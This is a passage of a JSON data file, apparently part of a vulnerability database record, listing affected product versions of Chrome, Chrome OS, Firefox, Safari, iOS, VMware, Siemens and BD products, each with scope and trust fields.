        "version": "14.0.835.162"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "11.0.696.29"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "9.3.1"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "6.0.433.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "18.0.1025.117"
      },
      {
        "model": "firefox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mozilla",
        "version": "1.5.0.10"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "35.0.1916.80"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "20.0.1132.14"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "10.0.648.201"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "30.0.1599.27"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "13.0.782.94"
      },
      {
        "model": "firefox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mozilla",
        "version": "3.5"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "10.0.612.0"
      },
      {
        "model": "safari",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "4.28"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "24.0.1312.11"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.375.52"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "38.0.2125.122"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "14.0.835.153"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "0.4.154.18"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.52"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "8.0.552.201"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "32.0.1687.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "11.0.696.22"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "20.0.1132.18"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "26.0.1410.28"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.11"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "16.0.903.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "8.0.552.11"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "17.0.963.51"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "11.0.672.2"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "12.0.733.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "13.0.749.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "17.0.963.48"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.113"
      },
      {
        "model": "safari",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "6.1"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "27.0.1453.37"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "37.0.2062.6"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "10"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "21.0.1180.36"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "13.0.762.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "33.0.1750.48"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "12.0.719.0"
      },
      {
        "model": "firefox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mozilla",
        "version": "34"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "27.0.1453.12"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.29"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "9.0.597.72"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "4.0.271.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "14.0.813.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "6.0.472.7"
      },
      {
        "model": "assurity linc",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "bd",
        "version": "0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "8.0.552.237"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "16.0.912.36"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "31.0.1650.38"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "6.0.472.53"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.77"
      },
      {
        "model": "safari",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "4.0.3"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "8.0.552.28"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "13.0.782.211"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "10.0.622.0"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "20.0.1132.17"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "11.0.673.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "33.0.1750.106"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "9.0.597.1"
      },
      {
        "model": "accuri c6 plus",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "bd",
        "version": "0"
      },
      {
        "model": "simatic ipc477c",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "siemens",
        "version": "0"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "9.3.3"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "29.0.1547.7"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "19.0.1063.1"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "6.1"
      },
      {
        "model": "safari",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "8.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "14.0.835.187"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "19.0.1055.3"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.383.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "14.0.790.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "6.0.465.1"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "8.0.552.7"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "32.0.1700.77"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "29.0.1547.51"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "8.0.552.319"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.375.33"
      },
      {
        "model": "fusion",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "vmware",
        "version": "8.0.1"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "11.0.696.24"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "11.0.658.1"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "48.0.2564.116"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "18.0.1025.8"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "51.0.2704.103"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "32.0.1668.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.37"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "33.0.1750.89"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "19.0.1084.7"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.1"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "9.0.597.80"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "17.0.932.0"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "21.0.1180.13"
      },
      {
        "model": "firefox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mozilla",
        "version": "29.0.1"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "26.0.1410.36"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "34.0.1847.101"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "13.0.782.34"
      },
      {
        "model": "pyxis infant care verification",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "bd",
        "version": "0"
      },
      {
        "model": "firefox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mozilla",
        "version": "31"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "3.0.195.21"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "16.0.912.34"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.41"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.114"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "49.0.2623.108"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "19.0.1064.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "11.0.696.23"
      },
      {
        "model": "firefox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mozilla",
        "version": "3.6"
      },
      {
        "model": "firefox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mozilla",
        "version": "2.0.6"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "11.0.686.0"
      },
      {
        "model": "pyxis supplystation",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "bd",
        "version": "0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "9.0.597.24"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "22.0.1229.6"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "32.0.1651.2"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "18.0.1003.0"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "32.0.1700.95"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.22"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "8.0.552.5"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.322.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "27.0.1453.45"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "22.0.1229.49"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.391.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "27.0.1453.107"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "16.0.912.6"
      },
      {
        "model": "identity manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "vmware",
        "version": "2.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "32.0.1664.3"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "19.0.1084.40"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "15.0.874.18"
      },
      {
        "model": "safari",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "8.0.7"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.89"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "64.0.3282.167"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "30.0.1599.2"
      },
      {
        "model": "safari",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "10.0.3"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "9.0.597.81"
      },
      {
        "model": "firefox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mozilla",
        "version": "10.0.1"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "37.0.2062.47"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "4.1.249.1031"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "21.0.1180.49"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "9.0.597.18"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "58.0.3029.89"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "18.0.1007.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.40"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "26.0.1410.14"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.326.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "12.0.742.22"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "21.0.1180.62"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "32.0.1680.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "6.0.472.11"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "10.0.603.2"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "7.0.517.39"
      },
      {
        "model": "sinema remote connect",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "siemens",
        "version": "0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.307.3"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "37.0.2062.76"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "11.0.686.1"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "8.0.552.213"
      },
      {
        "model": "x-series xos",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "bluecoat",
        "version": "9.7"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "32.0.1700.23"
      },
      {
        "model": "firefox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mozilla",
        "version": "36.0.4"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "20.0.1132.5"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "17.0.963.32"
      },
      {
        "model": "simatic field pg m5",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "siemens",
        "version": "22.1.5"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.80"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.79"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "4.1.249.1010"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "8.4"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "33.0.1750.113"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "8.0.552.337"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "12.0.742.51"
      },
      {
        "model": "firefox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mozilla",
        "version": "3.5.4"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "26.0.1410.4"
      },
      {
        "model": "pyxis medstation console",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "bd",
        "version": "40000"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "33.0.1750.28"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "20.0.1132.38"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "8.0.552.1"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "8.0.552.15"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "26.0.1410.27"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.170"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "28.0.1500.29"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.33"
      },
      {
        "model": "simatic hmi comfort panels",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "siemens",
        "version": "4"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "29.0.1547.37"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "4.1.249.1051"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "21.0.1180.78"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "14.0.835.98"
      },
      {
        "model": "safari",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "5.1.6"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "9.0.597.10"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "34.0.1847.112"
      },
      {
        "model": "firefox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mozilla",
        "version": "3.0.7"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "27.0.1453.87"
      },
      {
        "model": "firefox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mozilla",
        "version": "22.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "15.0.874.119"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "12.0.742.64"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "10.0.648.45"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "10.2.1"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "16.0.896.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "11.0.696.26"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "28.0.1500.59"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "33.0.1750.152"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "6.0.417.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "27.0.1453.86"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "8.0.552.218"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "8.0.552.334"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "16.0.912.26"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "11.0.657.0"
      },
      {
        "model": "firefox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mozilla",
        "version": "37.0.2"
      },
      {
        "model": "firefox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mozilla",
        "version": "52.0.1"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.342.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "6.0.418.1"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "4.1.249.1049"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "8.0.552.331"
      },
      {
        "model": "firefox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mozilla",
        "version": "26"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "11.0.667.4"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "4.1.249.1057"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "32.0.1673.4"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "11.0.689.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "19.0.1084.39"
      },
      {
        "model": "firefox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mozilla",
        "version": "43.0.2"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "20.0.1132.55"
      },
      {
        "model": "safari",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "6.2.1"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.152"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "13.0.782.55"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "24.0.1288.0"
      },
      {
        "model": "firefox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mozilla",
        "version": "40"
      },
      {
        "model": "vsphere data protection",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "vmware",
        "version": "6.0.6"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.390.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "32.0.1655.1"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "10.0.648.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "12.0.707.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "8.0.552.42"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "11.0.696.34"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "34.0.1847.76"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "7.0.517.38"
      },
      {
        "model": "firefox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mozilla",
        "version": "33"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "19.0.1081.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "31.0.1650.44"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "9.0.597.92"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "18.0.1025.50"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "21.0.1180.57"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "18.0.1011.1"
      },
      {
        "model": "fusion",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "vmware",
        "version": "8.5.9"
      },
      {
        "model": "firefox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mozilla",
        "version": "47"
      },
      {
        "model": "firefox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mozilla",
        "version": "1.5.0.3"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "19.0.1067.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "10.0.648.72"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "6.0.472.39"
      },
      {
